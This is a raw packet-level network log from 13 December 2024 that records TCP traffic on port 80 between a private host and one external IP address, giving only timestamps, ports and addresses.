Dec 13, 2024 07:47:07.573455095 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.573479891 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.573519945 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.573570013 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.574512959 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.574548960 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.574580908 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.574593067 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.575031996 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.575067043 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.575114965 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.575114965 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.575818062 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.575880051 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.576004982 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.576066971 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.576594114 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.576894045 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.576946020 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.577902079 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.577936888 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.577953100 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.577981949 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.579194069 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.579227924 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.579262972 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.579298973 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.579304934 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.579304934 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.579366922 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.579966068 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.580018044 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.580060005 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.580365896 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.581295967 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.581331015 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.581378937 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.581378937 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.582604885 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.582639933 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.582669020 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.582675934 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.582698107 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.582710028 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.582742929 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.582756042 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.583370924 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.583429098 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.583488941 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.583547115 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.584259033 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.584314108 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.584439039 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.584487915 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.585426092 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.585460901 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.585510969 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.585510969 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.587023973 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.587057114 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.587083101 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.587093115 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.587125063 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.587129116 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.587153912 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.587171078 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.587907076 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.587940931 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.587977886 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.588063955 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.589329958 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.589363098 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.589402914 CET	80	49740	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.589411020 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.589411020 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.589432955 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.589468956 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.589517117 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.591145039 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.591180086 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.591202021 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.591214895 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.591229916 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.591250896 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.591267109 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.591330051 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.592164993 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.592200994 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.592874050 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.592962027 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.592995882 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.593038082 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.593038082 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.593693018 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.593727112 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.593749046 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.593806982 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.594779968 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.594815969 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.594826937 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.594871998 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.595407009 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.595441103 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.595489025 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.595489025 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.596443892 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.596477985 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.596533060 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.597016096 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.597074032 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.598489046 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.598522902 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.598540068 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.598561049 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.598567963 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.598877907 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.599013090 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.599046946 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.599087000 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.599087000 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.599560976 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.599616051 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.600219965 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.600281954 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.600693941 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.600728989 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.600789070 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.601309061 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.601344109 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.601392031 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.601392031 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.602359056 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.602394104 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.602415085 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.602499008 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.603400946 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.603436947 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.603494883 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.603494883 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.603904009 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.603939056 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.604909897 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.604954958 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.604990959 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.605036974 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.605036974 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.605379105 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.605999947 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.606060982 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.606306076 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.606401920 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.606437922 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.606462002 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.606483936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.607095003 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.607151985 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.607374907 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.607578993 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.608006001 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.608074903 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.609735966 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.609775066 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.609808922 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.609846115 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.609863997 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.609863997 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.609879971 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.609894991 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.611332893 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.611397028 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.611429930 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.611464977 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.611476898 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.611476898 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.612335920 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.612406015 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.612438917 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.612473011 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.612502098 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.612531900 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.613276005 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.613310099 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.613331079 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.613969088 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.614003897 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.614016056 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.614038944 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.614059925 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.615128040 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.615161896 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.615183115 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.615216017 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.615650892 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.615685940 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.615712881 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.615786076 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.616689920 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.616724014 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.616821051 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.619369984 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.619430065 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.767680883 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.767904997 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.767908096 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.767966986 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.768114090 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.768150091 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.768160105 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.768224001 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.768899918 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.768959999 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.769179106 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.769305944 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.769423008 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.769510031 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.769990921 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.770037889 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.770159006 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.770210981 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.771040916 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.771075010 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.771123886 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.771123886 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.771727085 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.771802902 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.771933079 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.772061110 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.772543907 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.772597075 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.772708893 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.772778988 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.773607016 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.773641109 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.773662090 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.773682117 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.774223089 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.774315119 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.774601936 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.774709940 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.775300026 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.775355101 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.775413036 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.775986910 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.776082039 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.776122093 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.776189089 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.776829958 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.776945114 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.777013063 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.777859926 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.777894020 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.777910948 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.777987003 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.778587103 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.778655052 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.778707981 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.779093981 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.779593945 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.779650927 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.779706001 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.779865026 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.780453920 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.780487061 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.780514002 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.780590057 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.781176090 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.781209946 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.781258106 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.781258106 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.781949043 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.782052994 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.782185078 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.782293081 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.782814980 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.782849073 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.782879114 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.783206940 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.783581018 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.783638000 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.783699989 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.783756971 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.784658909 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.784693003 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.784746885 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.785403013 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.785444021 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.785501957 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.785501957 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.786787987 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.786823034 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.786870003 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.786870003 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.787111044 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.787144899 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.787161112 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.787199020 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.787872076 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.788110971 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.788173914 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.788223982 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.788973093 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.789006948 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.789056063 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.790335894 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.790371895 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.790401936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.790407896 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.790457010 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.790457010 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.790529013 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.790843010 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.791399956 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.791434050 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.791462898 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.791482925 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.792160034 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.792232037 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.792278051 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.792279005 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.793297052 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.793330908 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.793345928 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.793395042 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.794373035 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.794397116 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.794437885 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.794437885 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.794543028 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.794682980 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.795367956 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.795397997 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.795506954 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.795598984 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.795650005 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.796461105 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.796489000 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.796535969 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.796536922 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:07.797466993 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:07.797482967 CET	80	49738	185.81.68.147	192.168.2.4
